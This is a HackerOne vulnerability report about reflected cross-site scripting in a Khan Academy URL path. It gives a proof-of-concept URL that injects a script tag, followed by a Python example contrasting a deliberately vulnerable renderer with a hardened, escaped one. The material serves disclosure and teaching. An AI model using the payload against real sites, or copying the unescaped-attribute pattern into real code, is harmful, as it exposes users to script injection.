Khan Academy: Suffix of URL path is vulnerable to XSS attack

2014-05-25T10:41:24
ID H1:13285
Type hackerone
Reporter bigbear
Modified 2014-09-16T05:06:44

Description

PoC: http://smarthistory.khanacademy.org/Campin"><script>alert(/BigBear/)</script>.html

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
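The PoC above works because the tail of the request path is echoed into the page inside a double-quoted attribute, so a `"` in the path closes the attribute and the `>` that follows closes the tag. The snippet below is an added example written for this page, not code from Khan Academy or from the reporter: the `render_vulnerable` handler is a hypothetical reconstruction of that pattern (a canonical link whose `href` is built from the raw path, an assumption about the reflection point), `render_hardened` shows the two encodings the value actually needs (percent-encoding for the URL context, then HTML attribute escaping), and `count_script_tags` is a small check that parses the rendered markup to confirm whether the payload escaped the attribute.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

ORIGIN = "http://smarthistory.khanacademy.org"

# Constructed request path with the same shape as the PoC in the report.
PAYLOAD_PATH = '/Campin"><script>alert(/BigBear/)</script>.html'


def render_vulnerable(path: str) -> str:
    """Hypothetical vulnerable handler (assumption, not the real site code):
    the raw path is dropped straight into an href attribute. A '"' in the
    path terminates the attribute and '>' terminates the tag."""
    return f'<link rel="canonical" href="{ORIGIN}{path}">'


def render_hardened(path: str) -> str:
    """Hardened form of the same handler.

    Two contexts are nested here, so two encodings apply in order:
    1. URL context: percent-encode the path so '"', '<', '>' become
       %22, %3C, %3E (unquote first to avoid double-encoding an
       already-encoded path; '/' stays a path separator).
    2. HTML attribute context: html.escape(quote=True) turns any
       remaining '"' into &quot; so the attribute cannot be closed.
    """
    safe_path = quote(unquote(path), safe="/")
    return f'<link rel="canonical" href="{ORIGIN}{html.escape(safe_path, quote=True)}">'


class _ScriptTagCounter(HTMLParser):
    """Counts <script> start tags the browser-side parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "script":
            self.script_tags += 1


def count_script_tags(markup: str) -> int:
    """Parse the rendered markup and return how many <script> elements it
    contains. A reflected value that stayed inside the attribute yields 0;
    a value that broke out yields 1 or more."""
    parser = _ScriptTagCounter()
    parser.feed(markup)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = render(PAYLOAD_PATH)
        print(f"{name}: script tags = {count_script_tags(out)}")
        print("  " + out)
```

Running the block prints one `<script>` element for the vulnerable rendering and none for the hardened one. The check is deliberately done with a parser rather than a substring match, because the thing that matters is how the browser tokenises the page, not whether the characters are present; the same two-layer encoding applies wherever a path segment is reflected into a URL-valued attribute, whether a canonical link, a share button or a form action.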